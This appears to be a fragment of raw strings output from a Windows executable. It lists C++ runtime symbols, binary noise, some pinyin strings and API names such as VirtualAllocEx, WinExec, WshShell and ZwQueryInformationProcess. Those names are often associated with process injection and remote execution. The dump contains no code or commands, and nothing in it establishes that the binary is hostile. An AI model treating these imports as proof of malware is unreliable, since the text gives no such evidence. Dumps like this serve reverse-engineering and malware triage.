VC20XC00U
`vcall'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
=<=V=f=
`vftable'
VirtualAlloc
VirtualAllocEx
`virtual displacement map'
VirtualFree
VirtualFreeEx
VirtualQueryEx
VM_PreparedProgram
v	N+D$
,&[vrH
VWuBh<
WaitForSingleObject
Wednesday
WideCharToMultiByte
WinExec
WinHelpA
wininet.dll
WININET.dll
WINSPOOL.DRV
woqqqainima de a
Wow64DisableWow64FsRedirection
Wow64RevertWow64FsRedirection
\WPS Office 
(wqt\HHtS
WriteConsoleA
WriteConsoleW
WriteFile
WritePrivateProfileStringA
wshom.ocx
WshShell
wsprintfA
WTWindow
WwktZ=
"WWSh 
   xiaoxinrili
xppwpp
xpxxxx
=$=Y={=
   youdaochidian
{<:y&q?	
>=Yt/j
_^[YY]
_^][YY
YYF;5 
\yyfm0529
YYu-9D$
YYuTVWh
yyyy-MM-dd
YZ]_^[
z<3z(3z
z43j 3z 3j
z43r 3r
z83z$3z
Z9K|uU
;Z$sa;Z
zuKhx%B
ZwQueryInformationProcess